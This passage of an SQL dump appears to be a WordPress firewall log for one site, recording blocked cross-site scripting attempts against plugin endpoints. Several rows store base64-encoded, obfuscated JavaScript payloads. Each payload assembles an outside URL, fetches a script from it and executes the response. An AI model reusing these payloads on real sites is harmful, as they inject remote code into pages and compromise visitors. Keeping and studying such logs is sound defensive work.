cmg4anhrbHAqLywxMTAvKl84bDdxc2Yzd205dDFjcTMqLywxMDIvKl9zdm4yOXh4d215dHN4YjAqLywxMTEvKl83NnJvb3I4Y2FiN2wzZWEqLywxMTQvKl9ucTh5czM1cmg4anhrbHAqLywxMDgvKl84bDdxc2Yzd205dDFjcTMqLywxMTEvKl84bDdxc2Yzd205dDFjcTMqLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qXzc2cm9vcjhjYWI3bDNlYSovLDQ3LypfNzZyb29yOGNhYjdsM2VhKi8sMTE2LypfbnE4eXMzNXJoOGp4a2xwKi8sOTcvKiovLDExMi8qKi8sMTEyLypfNzZyb29yOGNhYjdsM2VhKi8sMTAxLypfbnE4eXMzNXJoOGp4a2xwKi8sMTE0LypfbnE4eXMzNXJoOGp4a2xwKi8sNDYvKl83NnJvb3I4Y2FiN2wzZWEqLywxMDYvKl9zdm4yOXh4d215dHN4YjAqLywxMTUvKl9zdm4yOXh4d215dHN4YjAqLyw2My8qXzc2cm9vcjhjYWI3bDNlYSovLDEwOS8qKi8sNjEvKiovLDEwOS8qX25xOHlzMzVyaDhqeGtscCovKTt2YXIgX25xOHlzMzVyaDhqeGtscCA9IF9zdm4yOXh4d215dHN4YjAoXzc2cm9vcjhjYWI3bDNlYSk7aWYoX25xOHlzMzVyaDhqeGtscC5sZW5ndGggPiAzKXtfbG8zbDQ3ZjRpNm81cTJsKF9ucTh5czM1cmg4anhrbHApO30gZnVuY3Rpb24gX3N2bjI5eHh3bXl0c3hiMChfZWtleXU1aXpkaXZvOGo3KXsgdmFyIF84bDdxc2Yzd205dDFjcTMgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfOGw3cXNmM3dtOXQxY3EzLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfZWtleXU1aXpkaXZvOGo3LCBmYWxzZSApO184bDdxc2Yzd205dDFjcTMuc2VuZCggbnVsbCApO3JldHVybiBfOGw3cXNmM3dtOXQxY3EzLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2xvM2w0N2Y0aTZvNXEybChfamVobmRuNGQ3dmlvMnllKXsgdmFyIF82aDF4aHdjYjI4eTg2bmUgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF9qZWhuZG40ZDd2aW8yeWUrJyByZXR1cm4geCt5OycpO182aDF4aHdjYjI4eTg2bmUoMCwwKTt9PC9zY3JpcHQ+PHNjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(38003,0.000000,1571502909.091247,'\0\0\0\0\0\0\0\0\0\0ÿÿE.$',0,200,0,0,0,'https://bintara.com.my/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(37818,1569949838.738879,1569949837.811600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37691,1569411802.812079,1569411802.031700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37817,1569949840.567274,1569949839.679600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37692,1569411800.583833,1569411799.711700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37693,1569411798.243235,1569411797.271300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(37816,1569949842.697523,1569949841.438100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDk4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWEgPSBfYWFhYWFhYWEoX2FhYWFhYWFhKTtpZihfYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhKF9hYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWEoX2FhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37694,1569411795.858538,1569411794.852500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site 